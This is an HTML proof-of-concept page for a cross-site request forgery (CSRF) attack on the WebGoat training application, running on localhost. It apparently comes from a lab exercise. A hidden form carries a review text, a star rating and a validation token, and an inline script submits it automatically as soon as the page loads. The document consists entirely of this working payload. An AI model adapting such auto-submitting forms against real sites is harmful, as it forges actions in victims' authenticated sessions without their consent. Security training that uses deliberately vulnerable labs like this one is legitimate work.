<FORM NAME="poc" ENCTYPE="application/x-www-form-urlencoded"
action="http://127.0.0.1:8000/WebGoat/csrf/review" METHOD="POST">
<input type="hidden" name='reviewText' value="this cant be happniiiing">
<input type="hidden" name='stars' value="5">
<input type="hidden" name='validateReq' value="2aa14227b9a13d0bede0388a7fba9aa9">
</FORM>
<script>document.poc.submit();</script>
